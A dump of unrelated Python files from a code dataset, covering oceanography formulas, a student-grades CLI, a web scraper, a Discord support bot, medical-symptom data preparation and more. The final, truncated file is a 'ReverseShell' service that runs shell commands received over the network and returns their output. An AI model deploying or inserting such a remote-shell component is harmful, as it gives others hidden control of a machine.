'a', 'sha256': 'b', 'crc32c': 'c', 's3_etag': 'd'})\n checksums.save_as_tags_on_s3_object()\n\n self.assertEqual(\n [\n {'Key': 'hca-dss-sha1', 'Value': 'a'},\n {'Key': 'hca-dss-sha256', 'Value': 'b'},\n {'Key': 'hca-dss-crc32c', 'Value': 'c'},\n {'Key': 'hca-dss-s3_etag', 'Value': 'd'}\n ],\n self.s3client.get_object_tagging(Bucket=self.upload_area.bucket_name, Key=s3obj.key)['TagSet'])\n","sub_path":"tests/unit/common/test_dss_checksums.py","file_name":"test_dss_checksums.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"181071044","text":"#!/usr/bin/python\n\nimport numpy as np\n\ndef oxy_sol(S, T, unit='micromole/kg'):\n '''\n Calculate oxygen saturation concentration in seawater as a function of\n S & T, in equilibrium with standard coponsition moist air at 1atm total\n pressure. From Garcia & Gordon (1992) eq. 8 (p. 1310) using coefficients\n of Benson & Krause in table 1, as used in Sarmiento & Gruber's \"Ocean\n Biogeochemical Dynamics\" ch. 3, p. 81, table 3.2.4.\n \n INPUT:\n S: salinity, psu\n T: temperature, deg C\n unit: micromole/kg or millimole/m3, default if micromole/kg\n \n OUTPUT:\n O2sol: oxygen solubility, unit same as input unit\n \n AUTHOR: Christopher Gordon\n Fisheries and Oceans Canada\n chris.gordon@dfo-mpo.gc.ca\n \n ACKNOWLEDGEMENT: this code is adapted from the SOCCOM SAGE_O2Argo matlab\n code, available via https://github.com/SOCCOM-BGCArgo/ARGO_PROCESSING,\n written by Josh Plant\n \n LAST UPDATE: 21-04-2020\n \n CHANGE LOG:\n '''\n\n # check for improper units\n if unit != 'micromole/kg' and unit != 'millimole/m3':\n raise ValueError('Unrecognized unit string - valid units are ''micromole/kg'' or ''millimole/m3''.')\n\n if unit == 'micromole/kg':\n A = [3.80369, -9.86643e-2, 5.10006, 4.17887, 3.20291, 5.80871]\n B = [-9.51519e-3, -1.13864e-2, -7.70028e-3, -7.01577e-3]\n C = -2.75915e-7\n\n elif unit == 'millimole/m3':\n A = [3.88767, -0.256847, 4.94457, 4.05010, 3.22014, 2.00907]\n B = [-8.17083e-3, -1.03410e-2, -7.37614e-3, -6.24523e-3]\n C = -4.88682e-7\n\n # Scaled temperature\n Ts = np.log((298.15 - T)/(273.15 + T));\n L = np.polyval(A,Ts) + S*np.polyval(B,Ts) + C*S**2\n\n O2sol = np.exp(L)\n\n return O2sol\n\ndef pH2O(T):\n '''\n Calculate vapor pressure of water\n \n INPUT:\n T: temperature, deg C\n \n OUTPUT:\n vapor_pressure: vapor pressure of water, Pa\n \n AUTHOR: Christopher Gordon\n Fisheries and Oceans Canada\n chris.gordon@dfo-mpo.gc.ca\n \n LAST UPDATE: 06-05-2020\n \n CHANGE LOG:\n '''\n \n # temperature in kelvin\n Tk = T + 273.15\n\n # from Johnson et al. (2015)\n vapor_pressure = np.exp(52.57 - (6690.9/Tk) - 4.681*np.log(Tk))\n\n return vapor_pressure\n\ndef pO2(DOXY, S, T):\n\n # temperature in kelvin\n Tk = T + 273.15\n # scaled temperature\n Ts = np.log((298.15 - T)/Tk)\n\n # Benson & Krause (cm^3/dm^3)\n # temperature coefficients\n pA = [3.88767, -0.256847, 4.94457, 4.05010, 3.22014, 2.00907]\n # salinity coefficients\n pB = [-8.17083e-3, -1.03410e-2, -7.37614e-3, -6.24523e-3]\n Co = -4.88682e-7\n O2_volume = 22.3916\n XO2 = 0.20946\n\n # Used for conversions from [O2] to pO2:\n p1 = np.polyval(pB,Ts)\n S_corr = S*p1 + Co*S**2\n L = np.polyval(pA,Ts) + S_corr;\n # Oxygen solubility real gas, mmol/m3\n O2sol = (1000/O2_volume) * np.exp(L)\n\n PPOX_DOXY = DOXY/O2sol * (1013.25 - pH2O(T)) * XO2\n\n return PPOX_DOXY\n\ndef atmos_pO2(P, pH2O):\n # molar fraction of oxygen in air\n XO2 = 0.20946\n # reference partial pressure of oxygen in air\n ppox = (P - pH2O) * XO2\n\n return ppox","sub_path":"build/lib/bgcArgo/unit.py","file_name":"unit.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"405095611","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom datetime import date\r\nimport sys\r\n\r\n\r\ndef add():\r\n name = input(\"Фамилия и инициалы \")\r\n post = input(\"Номер группы \")\r\n a = int(input(\"Русский язык \"))\r\n b = int(input(\"Математика \"))\r\n c = int(input(\"Информатика \"))\r\n d = int(input(\"История \"))\r\n e = int(input(\"Физика \"))\r\n student = {\r\n 'name': name,\r\n 'post': post,\r\n 'a': a,\r\n 'b': b,\r\n 'c': c,\r\n 'd': d,\r\n 'e': e,\r\n }\r\n students.append(student)\r\n if len(students) > 1:\r\n students.sort(key=lambda item: item.get('name', ''))\r\n\r\ndef list():\r\n for idx, student in enumerate(students, 1):\r\n print(\r\n '{:>7}: ФИО: {}, Номер группы: {}, Русский язык: {}, Математика: {}, Информатика: {}, История: {}, Физика: {};'.format(\r\n idx,\r\n student.get('name', ''), student.get('post', ''), student.get('a', 0),\r\n student.get('b', 0), student.get('c', 0),\r\n student.get('d', 0), student.get('e', 0)))\r\n\r\ndef bad():\r\n count = 0\r\n for student in students:\r\n if (student.get('a') == 2) or (student.get('b') == 2) or (student.get('c') == 2) \\\r\n or (student.get('d') == 2) or (student.get('e') == 2):\r\n count += 1\r\n print('{:>4}: {}'.format(count, student.get('name', '')))\r\n if count == 0:\r\n print(\"Таких студентов не выявлено.\")\r\n\r\ndef help():\r\n print(\"Список команд:\\n\")\r\n print(\"add - Добавить студента;\")\r\n print(\"list - Список студентов;\")\r\n print(\"bad - Студенты с плохой успеваемостью;\")\r\n print(\"help - отобразить справку;\")\r\n print(\"end - завершить работу с программой.\")\r\n\r\n\r\nif __name__ == '__main__':\r\n students = []\r\n while True:\r\n command = input(\">>> \").lower()\r\n if command == 'end':\r\n break\r\n elif command == 'add':\r\n add()\r\n elif command == 'list':\r\n list()\r\n elif command == 'bad':\r\n bad()\r\n elif command == 'help':\r\n help()\r\n else:\r\n print(f\"Неизвестная команда {command}\", file=sys.stderr)","sub_path":"ind1.py","file_name":"ind1.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"629582630","text":"# -*- coding: utf-8 -*-\nimport requests\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom ua import get_ua\nimport traceback\nimport time\nimport datetime\nimport re\nimport pymysql\nimport random\n\nconn = pymysql.connect(host='*****',user='root',passwd='*****',db='spiderdata',port=3306,charset='utf8')\ncur = conn.cursor()\ndriver =webdriver.Chrome('./chromedriver')\nfile = open('full_page.html','r')\nsoup = BeautifulSoup(file, 'html.parser')\nman_soup = soup.find('div',attrs={\"class\":\"account-list\"})\nlis = man_soup.find_all('li')\n#daren_index = \"http://******userId=\"\ncount = 0\nfor li in lis:\n if count < (457 + 600 + 836):\n count +=1\n continue\n try:\n daren_url = \"\"\n button = li.find('button')\n #darenId\n uid = ''\n uid = button.get('data-userid')\n #uid = \"2278640513\"\n daren_url = daren_index + uid\n driver.get(daren_url)\n time.sleep(2+random.random())\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n ###darenPic \n man_soup = soup.find('div',attrs={\"id\":\"app\"})\n try:\n sub_soup = man_soup.find_all('div')\n darenPic = sub_soup[1].get('style').split('\\\"')[1]\n p=re.compile(r'_\\d{3}x\\d{3}')\n darenPic = 'http:' + p.split(darenPic)[0]\n except:\n darenPic = ''\n '''\n try:\n sub_soup = man_soup.find_all('li')\n darenNick = sub_soup[0].find_all('span')[1].text.strip()\n except:\n darenNick = ''\n ###\n try:\n authInfo = sub_soup[2].find_all('span')[1].text.strip()\n except:\n authInfo = ''\n ###\n try:\n darenDesc = sub_soup[3].find_all('span')[1].text.strip()\n except:\n darenDesc = ''\n '''\n\n darenNick = ''\n authInfo = ''\n darenDesc = ''\n sub_soup = man_soup.find_all('li')\n for li in sub_soup:\n try:\n if u'昵称' in li.find_all('span')[0].text.strip():\n darenNick = li.find_all('span')[1].text.strip()\n elif u'认证信息' in li.find_all('span')[0].text.strip():\n authInfo = li.find_all('span')[1].text.strip()\n elif u'个人简介' in li.find_all('span')[0].text.strip():\n darenDesc = li.find_all('span')[1].text.strip()\n except:\n continue\n ###\n darenHomeUrl = \"http://****/home/\" + uid + '/'\n ### \n updateTime = datetime.datetime.now().strftime('%y-%m-%d %H:%M:%S');\n '''\n print(uid)\n print(darenNick)\n print(darenPic)\n print(authInfo)\n print(darenHomeUrl)\n print(darenDesc)\n print(updateTime)\n '''\n \n sql_cmd = \"select * from t_daren_userinfo where darenId=%s\" % uid\n rv = cur.execute(sql_cmd)\n tup = cur.fetchone()\n if tup:\n print(\"exist uid\",uid)\n sql_cmd = \"update t_daren_userinfo set darenNick=%s,darenPic=%s,authInfo=%s,darenHomeUrl=%s,darenDesc=%s,updateTime=%s where darenId=%s\"\n #print(sql_cmd)\n cur.execute(sql_cmd,(darenNick,darenPic,authInfo,darenHomeUrl,darenDesc,updateTime,uid))\n else:\n sql_cmd = \"insert into t_daren_userinfo (darenId,darenNick,darenPic,darenDesc,authInfo,darenHomeUrl) values(%s,%s,%s,%s,%s,%s)\"\n cur.execute(sql_cmd,(uid,darenNick,darenPic,darenDesc,authInfo,darenHomeUrl))\n #print(sql_cmd)\n print(\"no exist uid\",uid)\n\n conn.commit()\n continue\n #break\n\n except Exception as e:\n print(\"error %s %s %s\" % (e,uid,sql_cmd))\n continue\n #break\ndriver.close()\n","sub_path":"get_yhh.py","file_name":"get_yhh.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"104564512","text":"import os\nimport csv\n\n\nbudget_data = '/Users/HarpreetSingh/Desktop/Python-Challenge/budget_data.csv'\n\n\nwith open(budget_data, newline=\"\") as data:\n csvreader = csv.reader(data, delimiter=\",\")\n\n\n next(csvreader)\n\n\n monthavg = []\n profits = []\n months = []\n avgchange = []\n\n\n for col in csvreader:\n\n months.append((col[0]))\n profits.append(int(col[1]))\n\n\n print(\"Total Months:\", len(months))\n print(\"Total Profits:\", sum(profits))\n\n\n for i in range(2,len(profits)):\n monthavg.append(profits[i] - profits[i-1])\n avgchange = sum(monthavg)/len(profits)\n\n max_profit = max(profits)\n min_profit = min(profits)\n\n\n\n print(\"Average Profits per Month: $\", avgchange)\n print(\"Best Profit: $\", max_profit)\n print(\"Worst Profit: $\", min_profit)\n\n\n","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"314661354","text":"import csv\n\nfrom tunga_auth.models import TungaUser\nfrom django.core.management import BaseCommand\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n \"\"\"\n Migrate client invoices\n \"\"\"\n # command to run: python manage.py tunga_export_user_logins\n USER_TYPE_DEVELOPER = 1\n USER_TYPE_PROJECT_OWNER = 2\n USER_TYPE_PROJECT_MANAGER = 3\n user_type = {\n USER_TYPE_DEVELOPER: \"Developer\",\n USER_TYPE_PROJECT_OWNER: \"Project Owner\",\n USER_TYPE_PROJECT_MANAGER: \"Project Manager\",\n }\n\n users = TungaUser.objects.all().order_by('last_login')\n row = ['First Name', ' Last Name', 'Email', 'Last Login', 'User Role']\n with open('TungaUser.csv', 'a') as csvFile:\n writer = csv.writer(csvFile)\n writer.writerow(row)\n\n for user in users:\n writer.writerow([user.first_name, user.last_name, user.email,\n user.last_login,\n user_type.get(user.type, None)])\n\n csvFile.close()\n","sub_path":"tunga_utils/management/commands/tunga_export_user_logins.py","file_name":"tunga_export_user_logins.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"180645737","text":"\"\"\"Identify unprocessed identifiers.\"\"\"\n\nimport yaml\nimport click\n\nfrom dtool_azure import AzureDataSet, AzureProtoDataSet\n\n\n@click.command()\n@click.option('--config-path')\ndef main(config_path=None):\n\n with open('analysis.yml') as fh:\n analyis_config = yaml.load(fh)\n\n input_uuid = analyis_config['input_dataset']\n output_uuid = analyis_config['output_dataset']\n\n input_dataset = AzureDataSet.from_uri(input_uuid, config_path=config_path)\n output_dataset = AzureProtoDataSet.from_uri(output_uuid)\n\n input_identifiers = set(input_dataset.identifiers)\n\n completed_identifers = set([\n output_dataset._item_metadata(identifier)['from']\n for identifier in output_dataset._iteridentifiers()\n ])\n\n uncompleted_identififers = input_identifiers - completed_identifers\n\n print(\"Completed {} of {}\".format(\n len(completed_identifers),\n len(input_identifiers)\n )\n )\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/find_uncompleted.py","file_name":"find_uncompleted.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"642933570","text":"import argparse\nimport read_commands\nimport handle_internal_storage as stor\nimport util.api_token_gen as token_gen\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-y\",\"--yaml_files\", type=str,\n help=\"YAML files containing commands for the FarmBot, comma separated with NO spaces.\")\nparser.add_argument(\"-m\",\"--map\", type=str, default=None,\n help=\"a single CSV file containing the map of plant locations.\")\nparser.add_argument(\"-d\",\"--delete\", type=str,\n help=\"a) 'all', or b) a list of commands to delete, comma separated with NO spaces.\")\nparser.add_argument(\"-i\",\"--login\", type=str, nargs=2,\n help=\"Login to your FarmBot using your existing account. If this option is not chosen, the program will assume you are still logged in from last time.\")\nparser.add_argument(\"-o\",\"--logout\", type=str,\n help=\"Logout the Farmbot WebApp.\")\n\nargs = parser.parse_args()\n# remember to change 'myFile' to the name of User Manual\n# parser.add_argument(\"-h\", \"--help\", dest=\"myFile\", help=\"open user manual\")\n\n# myFile = args.myFile\n# text = open(myFile)\n# print(text.read())\n\nif args.login:\n token = token_gen.get_token(args.new_user[0], args.new_user[1])\n\n # login with new username and password -> generate a new .env file\n file = open(\".env\", \"w+\")\n file.write(\"EMAIL=\\\"\" + args.new_user[0] + \"\\\"\\n\")\n file.write(\"PASSWORD=\\\"\" + args.new_user[1] + \"\\\"\\n\")\n file.write(\"TOKEN=\\\"\" + token + \"\\\"\\n\")\n file.close()\nif args.logout:\n # delete the content of .env file\n file = open(\".env\", \"r+\")\n file.truncate(0)\n\n\nif args.delete:\n print(\"not here\")\n if args.delete == \"all\":\n stor.delete_all()\n else:\n objects = args.delete.split(',')\n for obj in objects:\n stor.delete_object(obj)\nif args.yaml_files:\n action_handler = read_commands.ActionHandler(args.yaml_files.split(','), args.map)\n print(action_handler.load_commands())\n","sub_path":"farmbot/farmbot.py","file_name":"farmbot.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"540088893","text":"import discord\nimport random\nfrom datetime import datetime\nfrom discord.ext import commands\n\n\nclass SupportCog(commands.Cog):\n def __init__(self, bot, category_id):\n self.bot = bot\n self.category_id = int(category_id)\n self.playing = \"DMでサポート受付 | v3.1\"\n self.mention_describe = \"\"\"\n・質問\n・リクエスト\n・バグ報告\n・通報\n・BAN解除申請\n・その他運営のサポートが必要\n\nいずれかに該当する場合は、このボットにDMを送信してください。\nボットを通して運営が対応いたします。\n\"\"\"\n self.reply_fails = \"\"\"\n> 返信先のDMが見つかりません。\n\n・ユーザーをボットが認識できる場合\n```\nウェブフックを編集して改善できます。\n1. チャンネルのウェブフックが存在しない場合は作成してください。\n2. ウェブフックの名前を正しい返信先のユーザーIDに置き換えてください。\n```\n・ユーザーをボットが認識できない場合\n```\n返信する手段がありません。\nサポートを終了してください。\n```\n\"\"\"\n\n def create_embed(self, message):\n c = random.randint(0, 0xFFFFFF)\n embed = discord.Embed(color=discord.Colour(c), timestamp=datetime.now())\n embed.set_author(name=message.author, icon_url=message.author.avatar_url)\n embed.set_footer(text=self.bot.user.name, icon_url=self.bot.user.avatar_url)\n\n if message.content:\n embed.add_field(name=\"内容\", value=message.content)\n\n files = \"\\n\".join([a.url for a in message.attachments])\n if files:\n embed.add_field(name=\"添付ファイル\", value=files, inline=False)\n\n return embed\n\n async def create(self, category, topic, hook_name):\n id = random.randint(100000, 1000000)\n channel = await category.create_text_channel(f\"サポート{id}番\", topic=topic)\n hook = await channel.create_webhook(name=hook_name)\n return channel, hook\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(f\"{self.bot.user} でログイン完了!\")\n\n await self.bot.change_presence(activity=discord.Game(self.playing))\n print(f\"プレイ中のゲームを {self.playing} に変更しました。\")\n\n self.category = self.bot.get_channel(self.category_id)\n print(f\"カテゴリーは {self.category} です。\")\n\n @commands.Cog.listener()\n async def on_message(self, message):\n if message.author.bot:\n return\n\n if self.bot.user in message.mentions:\n await message.channel.send(self.mention_describe)\n\n if message.channel in self.bot.private_channels:\n hooks = await self.category.guild.webhooks()\n hook_name = str(message.author.id)\n hook = discord.utils.find(lambda w: w.name == hook_name, hooks)\n\n if not hook:\n _, hook = await self.create(self.category, message.content, hook_name)\n await message.channel.send(\"> サポートを新たに開始しました!\")\n\n await hook.channel.send(embed=self.create_embed(message))\n await message.add_reaction(\"\\N{BALLOT BOX WITH CHECK}\")\n\n if message.channel in self.category.text_channels:\n hooks = await message.channel.webhooks()\n hook = discord.utils.find(lambda w: w.channel == message.channel, hooks)\n\n try:\n assert hook\n author_id = int(hook.name)\n author = self.bot.get_user(author_id)\n assert author\n except (ValueError, AssertionError):\n await message.channel.send(self.reply_fails)\n await message.add_reaction(\"\\N{CROSS MARK}\")\n return\n\n dm = await author.create_dm()\n\n await dm.send(embed=self.create_embed(message))\n await message.add_reaction(\"\\N{BALLOT BOX WITH CHECK}\")\n\n @commands.command(help=\"このボットを終了します。 (管理者のみ)\")\n async def stop(self, ctx):\n if await self.bot.is_owner(ctx.author):\n print(f\"{ctx.author} からの命令により終了中...\")\n await ctx.send(\"ボットを終了しています...\")\n await self.bot.logout()\n else:\n await ctx.send(\"ボットを終了するにはこのボットの管理者である必要があります!\")\n","sub_path":"cogs/supportcog.py","file_name":"supportcog.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"459207174","text":"#graph1.py\r\n\r\nfrom pygame import *\r\nfrom random import *\r\n\r\nscreen = display.set_mode((800, 600))\r\nrunning = True\r\n\r\nscreen.fill((247, 110, 110))\r\ndef distform(x1, y1, x2, y2):\r\n return int(((x1-x2)**2+(y1-y2)**2)**(1/2))\r\n\r\nscreen.fill((247, 110, 110))\r\n\r\nwhile running:\r\n for e in event.get():\r\n if e.type == QUIT:\r\n running = False\r\n if e.type == MOUSEBUTTONDOWN:\r\n screenPic = screen.copy()\r\n #--------------------------------------------\r\n mb = mouse.get_pressed()\r\n mx, my = mouse.get_pos()\r\n if mb[0] == 1:\r\n screen.blit(screenPic, (0,0))\r\n mouse.set_visible(False)\r\n draw.circle(screen, (0,255,0), (mx, my), 25)\r\n draw.circle(screen, (50,50,50), (mx, my), 26, 2)\r\n elif mb[2] == 1:\r\n screen.fill((247, 110, 110))\r\n mouse.set_visible(True) \r\n #--------------------------------------------\r\n display.flip()\r\n\r\nquit()\r\n \r\n","sub_path":"Pygame Exercises/graphex11.py","file_name":"graphex11.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"162288476","text":"import json\nimport os\nimport random\n\nimport numpy as np\nimport pymongo\nimport re\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport pandas as pd\nimport requests\nfrom tqdm import tqdm\n\nfrom configuration.config import treatment_data_path\n\n\ndef p1_read_csv(input_file, multi_label=False):\n def normalize(text, enable=True):\n if enable:\n text = text.replace('菊花', '肛门')\n text = text.replace('啪啪', '性交')\n text = text.replace('蛋蛋', '阴囊')\n text = text.replace('小弟弟', '阴茎')\n text = text.replace('腘窝', '膝盖后面')\n return text\n\n df = pd.read_csv(input_file)\n\n sym_alias_mappings = {}\n sym_utts_mappings = defaultdict(list)\n\n total_symptom = df['症状名称'][df['症状名称'].notnull()].values\n\n for row in df.iterrows():\n utt = row[1]['提问']\n if str(utt) == 'nan':\n continue\n # 1.症状名称\n if str(row[1]['症状名称']) != 'nan':\n symptom_name = re.sub('[\\t\\n]', '', row[1]['症状名称']).rstrip()\n curr_symptom_name = symptom_name\n else:\n symptom_name = curr_symptom_name\n # 别称\n if str(row[1]['别称']) != 'nan':\n alias = row[1]['别称'].split()\n alias = list(map(lambda x: normalize(x), alias))\n sym_alias_mappings.update({symptom_name: alias})\n # 问句\n if any(keyword in utt for keyword in ['是什么原因', '该怎么治', '要做什么检查', '应注意什么', '看什么医生', '去看什么科', '去哪家医院比较好']):\n continue\n\n utt = normalize(utt)\n if multi_label:\n # 多标签\n sym_list = [t for t in row[1].values[3:] if str(t) != 'nan' and t in total_symptom] + [symptom_name]\n sym_list.sort()\n sym_labels = '_'.join(sym_list)\n sym_utts_mappings[sym_labels].append(utt)\n else:\n # 单标签\n sym_utts_mappings[symptom_name].append(utt)\n\n print(f'symptom total num: {len(sym_utts_mappings.keys())}')\n print(f'symptom with alias num: {len(sym_alias_mappings.keys())}')\n print(f'alias num: {sum(map(len, sym_alias_mappings.values()))}')\n print(f'utts num: {sum(map(len, sym_utts_mappings.values()))}')\n print(f'avg utt num per class: {np.average(list(map(len, sym_utts_mappings.values())))}')\n\n return sym_utts_mappings, sym_alias_mappings\n\n\ndef p2_filter_api():\n # run load_db() fist\n db_symp = json.load((Path(treatment_data_path) / 'expand_data/db_symp.json').open())\n total_symp_names = db_symp['total_symp_names']\n total_sign_names = db_symp['total_sign_names']\n\n return total_symp_names, total_sign_names\n\n\ndef p3_export_2_json():\n # load filter\n total_symp_names, total_sign_names = p2_filter_api()\n\n # 1.read csv\n # 2.filter invalid\n # 3.write to json\n file_list = ['体征词0322.csv', '体征词0328.csv', '症状词0308.csv', '症状词0322.csv', '症状词0328.csv']\n for fn in file_list:\n print(fn)\n s_type = 'symptom' if '症状' in fn else 'sign'\n\n output_dic = defaultdict(list)\n\n input_path = Path(treatment_data_path) / 'raw' / fn\n sym_utts_mappings, sym_alias_mappings = p1_read_csv(input_path)\n\n for sym, utts in sym_utts_mappings.items():\n\n # filter not existed symptom\n if s_type == 'symp' and sym not in total_symp_names or (s_type == 'sign' and sym not in total_sign_names):\n print(f'Not Exist in db. {fn} -- {sym}')\n continue\n\n output_dic[s_type].append({\n s_type + '_name': sym,\n 'alias': sym_alias_mappings[sym],\n 'utterances': utts\n })\n\n json.dump(output_dic, (Path(treatment_data_path) / 'raw_json' / fn.replace('csv', 'json')).open('w'), ensure_ascii=False)\n\n\ndef p4_json_2_mongo():\n db_name = 'local_db'\n collection_name = 'corpus_symptom'\n mdb = pymongo.MongoClient()[db_name].get_collection(collection_name)\n\n input_path = Path(treatment_data_path) / 'raw_json'\n for fn in input_path.iterdir():\n symp_type = 'symptom' if '症状' in fn.name else 'sign'\n version = fn.name.split('.')[0]\n\n dic = json.load(fn.open())\n\n key = symp_type + '_name'\n for doc in dic[symp_type]:\n\n # 查重\n res = mdb.find({key: doc[key], 'data_type': 'train'})\n if res.count() > 0:\n print(f'Existed in mongodb. {doc[key]} -- {fn.name}')\n print(doc)\n print('-' * 50)\n continue\n\n doc.update({\n 'symp_type': symp_type,\n 'version': version,\n 'data_type': 'train'\n })\n\n mdb.update_one(filter={key: doc[key], 'data_type': 'train'},\n update={\"$set\": doc}, upsert=True)\n\n\ndef p5_split_train_dev():\n db_name = 'local_db'\n collection_name = 'corpus_symptom'\n mdb = pymongo.MongoClient()[db_name].get_collection(collection_name)\n\n res = mdb.find({'data_type': 'train'})\n train_dic, train = defaultdict(list), []\n label_list = []\n for doc in res:\n symp_type = doc['symp_type']\n if ' ' in doc[symp_type + '_name']:\n continue\n utterances = list(map(lambda x: re.sub('\\r*\\n*', '', x), doc['utterances']))\n if symp_type == 'symptom':\n label = doc['symptom_name']\n train_dic[label].extend(utterances)\n train.extend([f'{label} {a}' for a in doc['alias']])\n train.append(f'{label} {label}')\n else:\n label = doc['sign_name']\n train.extend([f'{label} {utt}' for utt in utterances])\n train.extend([f'{label} {a}' for a in doc['alias']])\n train.append(f'{label} {label}')\n label_list.append(label)\n\n dev = []\n for label, utts in train_dic.items():\n dev_utts = random.sample(utts, 0 if len(utts) * 0.2 < 1 else int(len(utts) * 0.2))\n train_utts = [u for u in utts if u not in dev_utts]\n\n dev.extend([f'{label} {utt}' for utt in dev_utts])\n train.extend([f'{label} {utt}' for utt in train_utts])\n\n test = train\n train = list(np.random.permutation(train * 5))\n\n chat_path = (Path(treatment_data_path) / 'chat_corpus.txt')\n chat_corpus = [line.strip() for line in chat_path.open()]\n selected_chat = random.sample(chat_corpus, 70)\n train.extend([f'负样本 {u}' for u in selected_chat[:50]])\n dev.extend([f'负样本 {u}' for u in selected_chat[50:]])\n test.extend([f'负样本 {u}' for u in selected_chat[:50]])\n\n # sent size\n train_sent_size = list(map(lambda x: len(x.split()[1]), train))\n dev_sent_size = list(map(lambda x: len(x.split()[1]), dev))\n print(f'sent size avg: {np.average(train_sent_size)}, max: {np.max(train_sent_size)}, min: {np.min(train_sent_size)}')\n print(f'sent size avg: {np.average(dev_sent_size)}, max: {np.max(dev_sent_size)}, min: {np.min(dev_sent_size)}')\n\n # save\n train_writer = (Path(treatment_data_path) / 'train_1.txt').open('w')\n dev_writer = (Path(treatment_data_path) / 'dev_1.txt').open('w')\n test_writer = (Path(treatment_data_path) / 'test_1.txt').open('w')\n\n train_writer.writelines([l + '\\n' for l in train])\n dev_writer.writelines([l + '\\n' for l in dev])\n test_writer.writelines([l + '\\n' for l in test])\n\n label_list.append('负样本')\n json.dump(label_list, (Path(treatment_data_path) / 'label_list.json').open('w'), ensure_ascii=False)\n\n\ndef p6_test_to_mongo():\n import pandas as pd\n base_path = '/Users/fengfan/Downloads/bx_ai诊疗'\n test_path = (Path(treatment_data_path) / '测试集.txt').open('w')\n for fn in Path(base_path).iterdir():\n if not fn.name.startswith('测试集'):\n continue\n\n df = pd.read_excel(fn)\n\n for row in df.iterrows():\n utt = row[1]['提问语料']\n if str(utt) == 'nan':\n continue\n utt = re.sub('\\r*\\n*', '', utt)\n utt = re.sub(' ', ',', utt)\n\n # 症状词\n if str(row[1]['症状词']) != 'nan':\n symptom_name = re.sub('[\\t\\n\\s]', '', row[1]['症状词'])\n curr_symptom_name = symptom_name\n else:\n symptom_name = curr_symptom_name\n\n level = int(row[1]['难度系数'])\n\n test_path.write(f'{symptom_name}\\t{utt}\\t{level}\\n')\n\n\nif __name__ == '__main__':\n p6_test_to_mongo()","sub_path":"pytorch_classification/prepare_symptom_data/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":8603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"265952217","text":"#构建矩阵\nimport csv\nimport numpy as np\nimport pandas as pd\ndef fea(text):\n import csv\n with open(text) as f:\n rows = csv.reader(f)\n res=[]\n num=0\n for row in rows:\n num+=1\n for i in range(len(row)):\n if row[i]!='':\n res.append(row[i])\n fea = list(set(res))\n return fea,num\nres,rownum=fea('/Users/hhy/Desktop/2/test.csv')\ncol=len(res)\nwith open('/Users/hhy/Desktop/2/fea.csv', 'w', encoding='gb18030', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(res)\n\ndic={}\n\n#构建空字典\nfor i in range(rownum):\n dic[str(i)]=[]\nwith open('/Users/hhy/Desktop/2/test.csv') as csvfile1:\n rows = csv.reader(csvfile1)\n i=0\n #按序号在字典中添加词\n for row in rows:\n if i <= rownum:\n for j in range(len(row)):\n if row[j]!='':\n dic[str(i)].append(str(row[j]))\n i+=1\n#print(dic)\n\n#构建矩阵\nb=np.zeros((rownum,col))\na=b.astype(int)\nfor i in range(len(res)):\n for j in range(rownum):\n if res[i] in dic[str(j)]:\n a[j][i]=1\nprint(len(a))\ndata1 = pd.DataFrame(a)\nprint(len(data1))\ndata1.to_csv('/Users/hhy/Desktop/2/newtest.csv')\n","sub_path":"sentiment/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"641693933","text":"import asyncio\nfrom asyncio.subprocess import PIPE, STDOUT\n\nfrom merlin.core import Service, OpCode\nfrom merlin.ext.ui import TcpServer\n\n\nclass ReverseShell(Service, TcpServer):\n @Service.listener(OpCode.Data)\n async def on_data(self, packet):\n process = await asyncio.create_subprocess_shell(packet.data, stdout=PIPE, stderr=STDOUT)\n\n try:\n stdout, _ = await process.communicate()\n except Exception as err:\n stdout = str(err).encode('utf-8')\n\n await packet.ack(stdout.decode('utf-8'))\n\n @Service.listener(OpCode.Ack)\n async def on_ack(self, packet):\n print('Recieved ack: ', repr(packet))\n\n # TCP Server\n\n @TcpServer.client_connected\n async def tcp_server_callback(self, reader, writer):\n async def callback(packet):\n writer.write('{0}:{1}'.format(str(packet.author), str(packet.data)).encode('utf-8'))\n await writer.drain()\n\n while True:\n data = (await reader.readline()).decode().strip()\n\n if data == 'exit':\n writer.close()\n await writer.wait_closed()\n break\n else:\n await self._client.send_packet(op=OpCode.Data, data=data, 